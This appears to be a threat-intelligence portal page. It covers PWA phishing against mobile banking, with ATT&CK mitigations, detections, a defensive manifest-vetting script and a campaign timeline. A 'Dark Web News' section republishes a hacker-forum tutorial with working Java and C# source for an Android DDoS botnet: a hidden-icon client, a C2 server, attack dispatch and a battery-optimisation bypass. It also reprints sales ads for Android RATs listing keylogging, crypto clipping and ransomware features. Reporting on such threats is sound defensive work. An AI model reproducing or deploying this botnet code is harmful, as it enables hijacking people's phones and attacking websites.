PWA Phishing Attacks Targeting Mobile Banking: The Next Generation Cyber Threat
BankingFraud PhishingAttacks PWA IOS Android

This campaign covers a new phishing technique that uses Progressive Web Apps (PWAs): attackers use fake banking applications to steal users' identity data. The flexibility of PWA technology makes these attacks more dangerous.


MITIGATION


T1660 Phishing


ID | Mitigation | Description
M1058 | Antivirus/Antimalware | Some mobile security products offer a loopback VPN used for inspecting traffic. This could proactively block traffic to websites that are known for phishing or appear to be conducting a phishing attack.
M1011 | User Guidance | Users can be trained to identify social engineering techniques and phishing emails.



T1417.002 Input Capture: GUI Input Capture


ID | Mitigation | Description
M1012 | Enterprise Policy | An EMM/MDM can use the Android DevicePolicyManager.setPermittedAccessibilityServices method to set an explicit list of applications that are allowed to use Android's accessibility features.
M1006 | Use Recent OS Version | The HIDE_OVERLAY_WINDOWS permission was introduced in Android 12, allowing apps to hide overlay windows of type TYPE_APPLICATION_OVERLAY drawn by other apps with the SYSTEM_ALERT_WINDOW permission, preventing other applications from creating overlay windows on top of the current application.[40]



T1437.001 Application Layer Protocol: Web Protocols

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.


REMEDIATION


T1660 Phishing


ID | Data Source | Data Component | Detects
DS0029 | Network Traffic | Network Traffic Content | Mobile security products may provide URL inspection services that could determine if a domain being visited is malicious.
DS0029 | Network Traffic | Network Traffic Flow | Enterprises may be able to detect anomalous traffic originating from mobile devices, which could indicate compromise.


T1417.002 Input Capture: GUI Input Capture


ID | Data Source | Data Component | Detects
DS0041 | Application Vetting | Permissions Requests | Application vetting services can look for applications requesting the android.permission.SYSTEM_ALERT_WINDOW permission in the list of permissions in the app manifest.
DS0042 | User Interface | System Settings | An Android user can view and manage which applications hold the SYSTEM_ALERT_WINDOW permission through the device settings in Apps & notifications -> Special app access -> Display over other apps (the exact menu location may vary between Android versions).
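
The manifest check described for DS0041 can be sketched as follows. This is an added example, not code from SOCRadar or MITRE; the sample manifest, the function name vet_manifest and the allowlist parameter are constructed for illustration. It also reports declared accessibility services, the feature an M1012 policy restricts, and it assumes the manifest has already been decoded to text XML.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
ATTR_NAME = "{%s}name" % ANDROID_NS
ATTR_PERMISSION = "{%s}permission" % ANDROID_NS

OVERLAY_PERMISSION = "android.permission.SYSTEM_ALERT_WINDOW"
A11Y_BIND_PERMISSION = "android.permission.BIND_ACCESSIBILITY_SERVICE"
A11Y_SERVICE_ACTION = "android.accessibilityservice.AccessibilityService"

# Constructed sample: a decoded AndroidManifest.xml for a made-up package.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.constructed.bank">
  <uses-permission android:name="android.permission.INTERNET" />
  <uses-permission-sdk-23 android:name="android.permission.SYSTEM_ALERT_WINDOW" />
  <application>
    <service android:name=".HelperService"
             android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService" />
      </intent-filter>
    </service>
    <service android:name=".SyncService" />
  </application>
</manifest>
"""


def _qualify(package, class_name):
    """Expand the manifest shorthand (".Foo" or "Foo") to a full class name."""
    if class_name.startswith("."):
        return package + class_name
    if "." not in class_name:
        return package + "." + class_name
    return class_name


def vet_manifest(manifest_xml, permitted_a11y_packages=frozenset()):
    """Return overlay/accessibility findings for one decoded manifest.

    permitted_a11y_packages is a hypothetical allowlist mirroring the list an
    EMM/MDM would pass to setPermittedAccessibilityServices.
    """
    data = manifest_xml.encode("utf-8") if isinstance(manifest_xml, str) else manifest_xml
    # Manifests come from untrusted APKs: refuse DTDs so entity-expansion
    # tricks never reach the parser.
    if b"<!DOCTYPE" in data or b"<!ENTITY" in data:
        raise ValueError("DTD/entity declarations are not expected in a manifest")
    root = ET.fromstring(data)
    if root.tag != "manifest":
        raise ValueError("not an AndroidManifest.xml document")
    package = root.get("package", "")

    # Permissions can be requested through either element.
    requested = set()
    for tag in ("uses-permission", "uses-permission-sdk-23"):
        for element in root.iter(tag):
            name = (element.get(ATTR_NAME) or "").strip()
            if name:
                requested.add(name)

    # An accessibility service is guarded by the BIND permission and/or
    # answers the AccessibilityService intent action.
    a11y_services = []
    for service in root.iter("service"):
        actions = {a.get(ATTR_NAME) for a in service.iter("action")}
        if (service.get(ATTR_PERMISSION) == A11Y_BIND_PERMISSION
                or A11Y_SERVICE_ACTION in actions):
            a11y_services.append(_qualify(package, service.get(ATTR_NAME, "")))

    findings = []
    requests_overlay = OVERLAY_PERMISSION in requested
    if requests_overlay:
        findings.append("requests %s (can draw over other apps)" % OVERLAY_PERMISSION)
    if a11y_services and package not in permitted_a11y_packages:
        findings.append("declares accessibility service(s) but is not on the allowlist: "
                        + ", ".join(a11y_services))
    return {
        "package": package,
        "requests_overlay": requests_overlay,
        "accessibility_services": a11y_services,
        "findings": findings,
    }


if __name__ == "__main__":
    for finding in vet_manifest(SAMPLE_MANIFEST)["findings"]:
        print(finding)
```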



T1437.001 Application Layer Protocol: Web Protocols


This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.


CONCLUSION

The research identifies a new phishing method that blends traditional social engineering with the flexibility of Progressive Web Apps (PWA). This method specifically targets Android users by using WebAPK technology to create fake versions of legitimate app pages on the Google Play store. Most of these attacks are focused in the Czech Republic, with two additional cases found in Hungary and Georgia. The fact that two distinct command and control (C&C) systems are in use suggests that two different groups may be responsible for these phishing efforts. Due to the complexity and close resemblance of these phishing apps to genuine ones, it is expected that similar attacks will become more common. Identifying the difference between real and fake apps after installation continues to be a significant challenge.


History Timeline

  • Wed, 28 Aug 2024 16:47:04 GMT
    New IOCs Added

    Total 12 IOCs added.

  • Wed, 28 Aug 2024 12:24:02 GMT
    Created!

    New Campaign created.

  • Tue, 20 Aug 2024 00:00:00 GMT
    Czech Mobile Users Targeted in New Banking Credential Theft Scheme

    Mobile users in the Czech Republic are the target of a novel phishing campaign that leverages a Progressive Web Application (PWA) in an attempt to steal their banking account credentials.



  • Fri, 01 Mar 2024 00:00:00 GMT
    First discovery of command and control (C2) servers
    Command and control (C2) servers receiving information from phishing applications were first discovered in March 2024. Data on the servers confirmed they were likely previously non-operational.
  • Wed, 01 Nov 2023 00:00:00 GMT
    First Case

    The first case of PWA phishing was detected in early November 2023 and its migration to WebAPKs was noticed in mid-November 2023.




  • Wed, 01 Nov 2023 00:00:00 GMT
    Progressive Web Application (PWA)

    This technique was first disclosed by CSIRT KNF in Poland in July 2023 and, in November 2023, observed in Czechia by ESET analysts working on the Brand Intelligence service. We also observed two cases of mobile campaigns against banks outside of Czechia: one case targeting the Hungarian OTP Bank and another targeting the Georgian TBC Bank.




Dark Web News




The Alleged Source Code of DDoS Android Botnet is Shared

In a hacker forum monitored by SOCRadar, a new alleged source code share is detected for DDoS Android Botnet.

Hello everyone. I have long planned to write this article, but there was no time because of my other projects. Now freed and finally decided to write an article about DDoS Botnet on Android. To begin with, I’ll explain what a DDoS Botnet is in principle, although I do not think that this needs an explanation, but in any case for the article it is necessary: DDoS-Botnet — is a network of infected devices controlled by an attacker to conduct distributed denial of service attacks (DDoS — Distributed Denial of Service). In such a network, every infected computer (or any other device, for example, a smartphone running Android, as in our case) becomes part of the botnet and receives commands from the server, receiving target addresses for attack. We will not do any ordinary HTTP Flood, working through queries, but fully downloading the web resource, in our case through WebView. I will also add another DDoS method exclusively for the example — for example, I will take ping, it is the easiest to implement, but also borders on the useless. In any case, this is not important, as it will be added as a practical example.
Subsequently, replacing it with other methods will not be a problem for you if you use the code from the article. I will use to write the server part C # (.NET 4.8) and WPF markup (Windows Presentation Foundation) I will use to write the client part Java (A) and Groovy dsl (build.gradle) with minimum API 28 (A9). I'll start with the code Android customer on Java. First we need to define permissions in ** XML: <uses-permission android:name=**.INTERNET" /> <uses-permission android:name=**.ACCESS_NETWORK_STATE" /> <uses-permission android:name=**n.WAKE_LOCK" /> <uses-permission android:name=**.FOREGROUND_SERVICE" /> <uses-permission android:name=**.FOREGROUND_SERVICE_DATA_SYNC" /> Also, if you want the icon of your application not to be visible, add to Activity inside AndroidManifest.xml following: XML: <category android:name="android.intent.category.LEANBACK_LAUNCHER" /> Since in MainActivity.java we will have nothing but launching our FOREGROUND_SERVICEthen its code will look like this: Java: package com.nmz.DDoSBTest; import android.content.Intent; import android.os.Bundle; import androidx.appcompat.app.AppCompatActivity; public class MainActivity extends AppCompatActivity { @** protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); Intent serviceIntent = new Intent(MainActivity.this, BackgroundWVService.class); //Запуск нашего сервиса до которого мы еще дойдем startService(serviceIntent); } } Nothing but launching the service happens, but I would like to go not immediately to it, but to talk a little about how our page will be downloaded through Webview. For this, there is a code in the code WebViewService.javawhich has the task of downloading the page in Adb display information about her in short. 
Code WebViewService.java: Java: private WebView webView; @** public void onCreate() { super.onCreate(); webView = new WebView(this); webView.setWebViewClient(new CustomWebViewClient()); webView.getSettings().setJavaScriptEnabled(true); } @** public int onStartCommand(Intent intent, int flags, int startId) { String url = intent.getStringExtra("url"); if (url != null) { if (!isValidUrl(url)) { url = "http://" + url; } Log.d(TAG, "Loading URL/IP in WebView: " + url); webView.loadUrl(url); } else { Log.e(TAG, "No URL/IP received"); } return START_NOT_STICKY; } @** public void onDestroy() { if (webView != null) { webView.destroy(); } super.onDestroy(); } @** public IBinder onBind(Intent intent) { return null; } private boolean isValidUrl(String url) { return url.startsWith("http://") || url.startsWith("https://"); } private class CustomWebViewClient extends WebViewClient { @** public void onPageStarted(WebView view, String url, android.graphics.Bitmap favicon) { super.onPageStarted(view, url, favicon); Log.d(TAG, "Page loading: " + url); } @** public void onPageFinished(WebView view, String url) { super.onPageFinished(view, url); Log.d(TAG, "Page finished loading: " + url); String title = view.getTitle(); Log.d(TAG, "Page title: " + title); } @** public void onReceivedHttpError(WebView view, WebResourceRequest request, android.webkit.WebResourceResponse errorResponse) { super.onReceivedHttpError(view, request, errorResponse); Log.e(TAG, "HTTP error for URL/IP: " + request.getUrl() + " Error code: " + errorResponse.getStatusCode()); } @** public void onReceivedError(WebView view, int errorCode, String description, String failingUrl) { super.onReceivedError(view, errorCode, description, failingUrl); Log.e(TAG, "Error loading URL/IP: " + failingUrl + " Error code: " + errorCode + " Description: " + description); } } } The code uploads the web page to Webview and displays brief content about her. 
Now I would like to mark the code AttackerReceiverURLIP.javawho gets IP or URL the site, then checks it for validation, and if it receives IP without the HTTP / HTPPS header, then adds it and sends it further to WebViewService.java. Code AttackerReceiverURLIP.java: Java: public class AttackerReceiverURLIP extends BroadcastReceiver { @** public void onReceive(Context context, Intent intent) { String url = intent.getStringExtra("url"); Log.d("UrlReceiver", "Received URL: " + url); if (url != null) { // Проверка и добавление префикса например если передан ip ну и проверочка if (!url.startsWith("http://") && !url.startsWith("https://")) { url = "https://" + url; } if (isValidUrl(url)) { Intent serviceIntent = new Intent(context, WebViewService.class); serviceIntent.putExtra("url", url); context.startService(serviceIntent); } else { Log.e("UrlReceiver", "Invalid URL received: " + url); } } } private boolean isValidUrl(String url) { return url != null && (url.startsWith("http://") || url.startsWith("https://")); } } Now you should go to the last service on the client side — this BackgroundWVService.java, and here, accordingly, its code: Java: private static final String CHANNEL_ID = "DDoSForegroundServiceChannel"; private Handler ReconnectServerHandler = new Handler(Looper.getMainLooper()); private boolean isConnected = false; private Socket clientSocket; private BufferedReader input; private OutputStream output; @** public void onCreate() { //инициализации в onCreate super.onCreate(); createNotificationChannel(); startForegroundService(); connectToServer(); } private void createNotificationChannel() { //13,14D требуют подобных извращений. 
if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) { CharSequence name = "Foreground Service"; String description = "Channel"; int importance = NotificationManager.IMPORTANCE_DEFAULT; NotificationChannel channel = new NotificationChannel(CHANNEL_ID, name, importance); channel.setDescription(description); NotificationManager notificationManager = getSystemService(NotificationManager.class); notificationManager.createNotificationChannel(channel); } } private void startForegroundService() { Intent notificationIntent = new Intent(this, MainActivity.class); PendingIntent pendingIntent = PendingIntent.getActivity(this, 0, notificationIntent, PendingIntent.FLAG_IMMUTABLE); Notification notification = new NotificationCompat.Builder(this, CHANNEL_ID) .setContentTitle("Foreground Service") .setContentText("Service is running in the background") .setSmallIcon(R.mipmap.ic_launcher) .setContentIntent(pendingIntent) .build(); startForeground(1, notification); } @** public int onStartCommand(Intent intent, int flags, int startId) { return START_STICKY; } private void connectToServer() { new ConnectToServerTask().execute("127.0.0.1", "6666");//ip:p сервера } private class ConnectToServerTask extends AsyncTask<String, Void, Boolean> { private String serverIp; private int serverPort; @** protected Boolean doInBackground(String... 
params) { serverIp = params[0]; serverPort = Integer.parseInt(params[1]); while (!isConnected) { try { clientSocket = new Socket(serverIp, serverPort); input = new BufferedReader(new InputStreamReader(clientSocket.getInputStream())); output = clientSocket.getOutputStream(); isConnected = true; new ReceiveMessagesTask().start(); } catch (Exception e) { Log.e("ConnectToServerTask", "Error connecting to server, retrying in 5 seconds", e); try { Thread.sleep(5000); } catch (InterruptedException ie) { Log.e("ConnectToServerTask", "Interrupted during reconnection delay", ie); } } } return false; } @** protected void onPostExecute(Boolean result) { if (result) { Toast.makeText(getApplicationContext(), "Connected to the server", Toast.LENGTH_SHORT).show(); } else { startReconnection(); } } } private void startReconnection() { ReconnectServerHandler.postDelayed(() -> { if (!isConnected) { Log.d("Reconnection", "Attempting to reconnect..."); connectToServer(); } }, 5000); } private class SendMessageTask extends AsyncTask<String, Void, Void> { private static final int CHUNK_SIZE = 1024; private static final long DELAY_MS = 500; @** protected Void doInBackground(String... 
messages) { try { if (isConnected && output != null) { for (String message : messages) { byte[] messageBytes = message.getBytes(); int length = messageBytes.length; for (int i = 0; i < length; i += CHUNK_SIZE) { int end = Math.min(length, i + CHUNK_SIZE); output.write(messageBytes, i, end - i); output.flush(); Thread.sleep(DELAY_MS); } } } } catch (Exception e) { Log.e("SendMessageTask", "Error sending message", e); } return null; } } private class ReceiveMessagesTask extends Thread { private final Handler uiHandler = new Handler(Looper.getMainLooper()); @** public void run() { try { while (isConnected) { String message = input.readLine(); if (message != null) { if (isValidUrl(message)) { handleUrl(message); } else { uiHandler.post(() -> Toast.makeText(getApplicationContext(), "msg s: " + message, Toast.LENGTH_LONG).show()); } } } } catch (Exception e) { Log.e("ReceiveMessagesTask", "Connection lost, attempting to reconnect", e); isConnected = false; startReconnection(); } } } private void handleUrl(String url) { //Добавление http чтобы если например человек передал ip то мы перешли по нему как и по ссылке if (!url.startsWith("http://") && !url.startsWith("https://")) { url = "https://" + url; } Intent intent = new Intent(BackgroundWVService.this, WebViewService.class); intent.putExtra("url", url); startService(intent); } private boolean isValidUrl(String url) { try { Uri uri = Uri.parse(url); return uri.getScheme() != null && (uri.getScheme().equals("http") || uri.getScheme().equals("https")); } catch (Exception e) { return false; } } @** public void onDestroy() { super.onDestroy(); try { isConnected = false; if (clientSocket != null) { clientSocket.close(); } } catch (Exception e) { Log.e("onDestroy", "Error closing socket", e); } } @** public IBinder onBind(Intent intent) { return null; } } The customer code is over. 
I did not describe some already understandable moments, such as the whole code Manifest or sending specific data to the server, such as the version Android or device model, although you can easily get them and send them to the server if you wish. Java: AndroidVersion = "Android Version: " + Build.VERSION.RELEASE; SDeviceModel = "Device Model: " + Build.MODEL; Now that everything is more or less clear with the client code and what happens on its side, you can proceed to the server code. On the server side there will be no builder or any — screws exclusively the functionality of sending data to the server and receiving responses from the client. Code DDoServer: C #: public partial class MainWindow : Window { private ObservableCollection<ClientInfo> _clients; private TcpListener _server; private Thread _serverThread; private Thread _monitorThread; private int _serverPort = 4444; //стандартный порт прослушивания private Dictionary<string, string> _clientMessages; private volatile bool _isServerRunning; private ConcurrentDictionary<string, TcpClient> _connectedClients; public MainWindow() { InitializeComponent(); _clients = new ObservableCollection<ClientInfo>(); //Инициализации clientsview.ItemsSource = _clients; _clientMessages = new Dictionary<string, string>(); _connectedClients = new ConcurrentDictionary<string, TcpClient>(); } Handler StartServer: C #: if (_serverThread != null && _serverThread.IsAlive) { MessageBox.Show("Server is already running."); return; } if (!int.TryParse(portTextBox.Text, out _serverPort)) { MessageBox.Show("Invalid port number. 
Please enter a valid number."); return; } _serverThread = new Thread(StartServer); _serverThread.IsBackground = true; _serverThread.Start(); _monitorThread = new Thread(MonitorClients); _monitorThread.IsBackground = true; _monitorThread.Start(); } Methods / Other: C #: private void StartServer() { try { _server = new TcpListener(IPAddress.Any, _serverPort); _server.Start(); _isServerRunning = true; Dispatcher.Invoke(() => MessageBox.Show($"Server started on port {_serverPort}")); while (_isServerRunning) { if (_server.Pending()) { TcpClient client = _server.AcceptTcpClient(); IPEndPoint clientEndPoint = client.Client.RemoteEndPoint as IPEndPoint; if (clientEndPoint != null) { string clientIp = clientEndPoint.Address.ToString(); if (_connectedClients.ContainsKey(clientIp)) { if (_connectedClients.TryRemove(clientIp, out TcpClient oldClient)) { oldClient.Close(); } } if (_connectedClients.TryAdd(clientIp, client)) { Dispatcher.Invoke(() => { var existingClient = _clients.FirstOrDefault(c => c.IPAddress == clientIp); if (existingClient == null) { _clients.Add(new ClientInfo { IPAddress = clientIp, TcpClient = client }); } else { existingClient.TcpClient = client; } MessageBox.Show($"New client connected: {clientIp}"); }); } Thread clientThread = new Thread(() => HandleClient(client, clientIp)); clientThread.IsBackground = true; clientThread.Start(); } } else { Thread.Sleep(100); } } } catch (SocketException ex) { if (ex.SocketErrorCode != SocketError.Interrupted) { Dispatcher.Invoke(() => MessageBox.Show($"Error: {ex.Message}")); } } catch (Exception ex) { Dispatcher.Invoke(() => MessageBox.Show($"Error: {ex.Message}")); } } private void HandleClient(TcpClient client, string clientIp) { try { NetworkStream stream = client.GetStream(); byte[] buffer = new byte[1024]; int bytesRead; while ((bytesRead = stream.Read(buffer, 0, buffer.Length)) > 0) { string message = Encoding.UTF8.GetString(buffer, 0, bytesRead); lock (_clientMessages) { _clientMessages[clientIp] = 
message; } SaveMessageToFile(clientIp, message); var lines = message.Split(new[] { '\n' }, StringSplitOptions.RemoveEmptyEntries); Dispatcher.Invoke(() => { foreach (var line in lines) { if (clientsview.SelectedItem is ClientInfo selectedClient && selectedClient.IPAddress == clientIp) { packetText.Text += line + Environment.NewLine; } } }); } } catch (Exception ex) { Console.WriteLine($"Client error: {ex.Message}"); } finally { Dispatcher.Invoke(() => { try { lock (_clients) { var clientInfo = _clients.FirstOrDefault(c => c.IPAddress == clientIp); if (clientInfo != null) { _clients.Remove(clientInfo); } } lock (_clientMessages) { if (_clientMessages.ContainsKey(clientIp)) { _clientMessages.Remove(clientIp); } } if (clientsview.SelectedItem is ClientInfo selectedClient && selectedClient.IPAddress == clientIp) { packetText.Text = string.Empty; } } catch (Exception uiEx) { Console.WriteLine($"UI error: {uiEx.Message}"); } }); try { client.Close(); } catch (Exception ex) { Console.WriteLine($"Error closing client connection: {ex.Message}"); } } } private void MonitorClients() { while (_isServerRunning) { foreach (var kvp in _connectedClients.ToList()) { string clientIp = kvp.Key; TcpClient client = kvp.Value; try { if (client.Client.Poll(0, SelectMode.SelectRead)) { byte[] check = new byte[1]; if (client.Client.Receive(check, SocketFlags.Peek) == 0) { Dispatcher.Invoke(() => { var clientInfo = _clients.FirstOrDefault(c => c.IPAddress == clientIp); if (clientInfo != null) { _clients.Remove(clientInfo); } lock (_clientMessages) { if (_clientMessages.ContainsKey(clientIp)) { _clientMessages.Remove(clientIp); } } if (clientsview.SelectedItem is ClientInfo selectedClient && selectedClient.IPAddress == clientIp) { packetText.Text = string.Empty; } }); _connectedClients.TryRemove(clientIp, out _); client.Close(); } } } catch (Exception ex) { Console.WriteLine($"Error monitoring client {clientIp}: {ex.Message}"); } } Thread.Sleep(5000); } } private void StopServer() { try { 
_isServerRunning = false; _server?.Stop(); foreach (var clientInfo in _clients.ToList()) { if (clientInfo.TcpClient != null && clientInfo.TcpClient.Connected) { clientInfo.TcpClient.Close(); } } _serverThread?.Join(); _monitorThread?.Join(); Dispatcher.Invoke(() => MessageBox.Show("Server stopped successfully.")); } catch (Exception ex) { Dispatcher.Invoke(() => MessageBox.Show($"Error stopping server: {ex.Message}")); } } Well, at the end of — code for sending information to the client: C #: string link = DDoSTx.Text; if (!string.IsNullOrWhiteSpace(link)) { SendMessageToAllClients(link); } else { MessageBox.Show("Write Link."); } --- foreach (var clientInfo in _clients.ToList()) { if (clientInfo.TcpClient != null && clientInfo.TcpClient.Connected) { try { NetworkStream stream = clientInfo.TcpClient.GetStream(); byte[] buffer = Encoding.UTF8.GetBytes(message + "\n"); stream.Write(buffer, 0, buffer.Length); stream.Flush(); Also added a code that sends a task to one selected client from the list. IP: C #: if (clientsview.SelectedItem is ClientInfo selectedClient) { string clientIp = selectedClient.IPAddress; if (_clientMessages.ContainsKey(clientIp)) { string link = DDoSTx.Text; if (!string.IsNullOrWhiteSpace(link)) { SendLinkToClient(clientIp, link); } else { MessageBox.Show("Write Link/Ip."); } } else { MessageBox.Show("Client not found."); } } else { MessageBox.Show("Select a client from the list of IP."); } } And the method for this business: C #: private void clientsview_SelectionChanged(object sender, SelectionChangedEventArgs e) { if (clientsview.SelectedItem is ClientInfo selectedClient) { if (_clientMessages.ContainsKey(selectedClient.IPAddress)) { packetText.Text = _clientMessages[selectedClient.IPAddress]; } } } View Attachment 94963 GUI server panel written in WPF (Windows Presentation Foundation) (a newer version than described in the article) includes markings and designs that were not described in the article. 
The article provided exclusively code without markup and design. I want to note that this can only be used for web resources in connection with the logic of working through WebView, but you can add your code for other attack methods you need. Thank you for your attention! If there are any questions or additions, I will be happy to discuss. All the best: smile10 :. ps: In the new versions of Android, the rules for working background services have been tightened, and the activity control system (BATTERY_OPTIMIZATIONS) can forcibly complete our process. To prevent this, you can add the following code to MainActivity.java: Java: if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) { if (!Settings.canDrawOverlays(this)) { showDisableBatteryOptimizationDialog(); } } } private void showDisableBatteryOptimizationDialog() { new AlertDialog.Builder(this) .setTitle("Отключение контроля активности") .setMessage("Для корректной работы приложения отключите контроль активности в настройках батареи.") .setPositiveButton("Перейти в настройки", (dialog, which) -> { Intent intent = new Intent(Settings.ACTION_IGNORE_BATTERY_OPTIMIZATION_SETTINGS); startActivity(intent); }) .setNegativeButton("Отмена", null) .show(); } You also need to add uses-permission to the file. AndroidManifest.xml: XML: <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/> by: **




Viper Android Tool is on Sale

In a hacker forum monitored by SOCRadar, the sale of a new Android tool called Viper is detected.

SPECIAL OPPORTUNITIES: Apk support for version 14. (verified on Android 14) Smooth hidden control Vnc (show text during control) VNC layout management (stable, no delay) Screen Reading Program | With this function, you can enter any banking application and withdraw money, The screen text logger + controller (which helps you track or control each individual bank and cryptocurrency transaction) to bypass the black screen problem. See the initial phrases of the wallet. Screenshot | show all Tasks in real time with a controlled screen |: unlock in one click () PIN unlock Graphics Key Unlock Apk Lock PIN and graphic key (automatic definition) Delete the captured lock data (if the lock password was not captured correctly, prepare it again for re-capture with one click of the mouse) 🔥 Superfast keylogger (PIN code record, template, passwords (record all credentials) 🌐 Fisher link | This will help you redirect any real or phishing link that can intercept all the credentials. we provide more than 500 of the latest injections, including cryptocurrency and banks. Wallets and more 💸 (Crypto Clipper: support for more than 40 wallets | Btc, eth, BNB, trc20, trc25 and others, | which will help you replace your wallet with the recipient's wallet address ( (You get all the cryptophonts that the victim can send anywhere) ✉ Read live notifications ‼ Automatically uninstall Apk with command (no trace) 🚫 Anti-removal 🖥 SMS Interception Calls, Contacts, () File Manager © Turn on / off applications 📎 Living camera (front / back) - 🎙 Live microphone (speak / listen) And much more……. Accept translation from the guarantor of the forum


A New Android RAT is on Sale

In a hacker forum monitored by SOCRadar, a new Android RAT sale is detected.

Android RAT is the best on the market tg channel : https://** contact tg : https://** 1 month 1500 usd 2 month 2500 usd ~ Screen control ~ Hidden automatic permissions ~ Lock / unlock the screen but sometimes the first time may not unlock the password or pattern for this there is a button to reset the memory and recapture. there is also a solution to capture by giving the victim a phishing pattern or pin code to unlock. also you can see the pin code in the keylogger. ~ Keyboard for keystroke unlocking ~ Ransomware (full phone lock and display message and QR code to pay money. ~ Black screen to silently control your phone ~ Text readers on screen ~ Anti-Uninstall ~ SMS Interception ~ Calls, Contacts, ~ File Manager - 11 crypto-injections (trustwallet, metamask, binance, exodus, bybit, huobi, sberbank, coinbase, kucoin, etc.) waits until the victim decides to log into the application and issues a phish request instead of the original application to capture logs. ~ Enable / disable applications ~ Live Camera (Front / Back) ~ Live Microphone (talk / listen) ~ Keylogger to capture all passwords, but it happens that not all passwords are captured or the victim may have a face ID or a finger to enter a particular application. - Screen Reader is a black screen reader for bypassing black screen in applications like revolution or smart id or authenticator. There are also issues with the crypto apk, as we are always trying to improve our crypto to bypass the protection of top banks, because it happens that Google does not detect the virus, but Sberbank for example does. Crypt can fall off because of some client to whom you will throw and he will not install and will send there to Google or to the virus total.
In the panel it will be possible to make yourself an apk as much as you want plus I will give the latest actual method of crypto with the help of programs so that you can make yourself several apks. If the crypto falls off, all the clients that you put this particular apk with this crypto will disappear because they will also start detecting. And the victim can always stop you from turning off the phone or pulling out the SIM card or turning off the Internet or start clicking all the buttons when you turn off the screen, you have full access but the victim can stop you from doing anything so you have to learn how to do it. and so much more.


Reaper Android Rat V6 is on Sale

In a hacker forum monitored by SOCRadar, a new Reaper Android RAT V6 sale is detected.

Apk Support on version 14. (tested on android 14) Smooth Hidden Vnc Control (show text during control) Layout vnc control (stable no lag) Screen Reader | With this feature, you can enter any banking Application and withdraw Money, Screen Text Logger + controller (that Helps you to monitor or control every single bank and crypto transaction) bypass black screen problem. See wallet seed phrases. Screen Capturer | show all Tasks live with controllable screen : one click unlock() Pin Unlock Pattern Unlock Apk pin and pattern lock (auto detect) Remove captured lock data (if did not capture the lock password correctly then make again ready to capture again in just one click) Super Fast keylogger (Record pin, pattern, passwords, (record all Credentials) Phisher link | the help you to redirect any real or phishing link that can Grab all credentials we provide 500 + latest injections including Crypto and banks. Wallets much more (Crypto Clipper: support 40+ wallets | Btc, eth, BNB, trc20, trc25 more, that help you to Replace your wallet into Receiver wallet address ( (You Get All Crypto Funds that the victim can send anywhere) Read Live Notifications !! Auto Delete Apk using Command (No Traces) Anti-Uninstall SMS interceptions Calls, Contacts, () File manager © Enable/Disable Apps Live Camera (Front/Back) Live microphone (Speak/listen) And many more.......




New Android Spy SpinOk Module is Detected

In a hacker forum monitored by SOCRadar, a new Android spy SpinOk module is detected.

Doctor Web has discovered a malicious Android.Spy.SpinOk module that can steal personal data and files from hundreds of millions of devices. Doctor Web has detected a new threat for Android device owners - Android.Spy.SpinOk, a malicious module that is embedded in various games and applications available in the official Google Play catalog. The module can collect and transfer users' personal data and files to attackers, as well as replace and upload the contents of the clipboard to a remote server. Android.Spy.SpinOk masquerades as a marketing tool that offers users mini-games, a task system, and prize draws. However, in fact, this module establishes a connection with the C&C server and sends it various technical information about the infected device, including data from sensors such as a gyroscope, magnetometer, etc. This allows attackers to bypass defense mechanisms and hide their activity from researchers. In addition, Android.Spy.SpinOk loads banner ads into the WebView with arbitrary links received from the C&C server. These banners contain JavaScript code that can access files and the clipboard on the user's device. Thus, attackers can steal confidential information such as passwords, card numbers, documents, etc. Doctor Web specialists found this Trojan module in 101 applications from Google Play that were downloaded at least 421,290,300 times.
Among them are such popular programs as: Noizz: video editor with music (at least 100,000,000 installs), Zapya - Transfer, file exchange (at least 100,000,000 installations; the Trojan module was present from version 6.3.3 to version 6.4 and is not present in the current version 6.4.1), VFly: video editor&video maker (at least 50,000,000 installs), MVBit - MV video status maker (at least 50,000,000 installs), Biugo: magical video editor (at least 50,000,000 installs). The company has also reported the issue to Google and hopes it will be fixed soon.

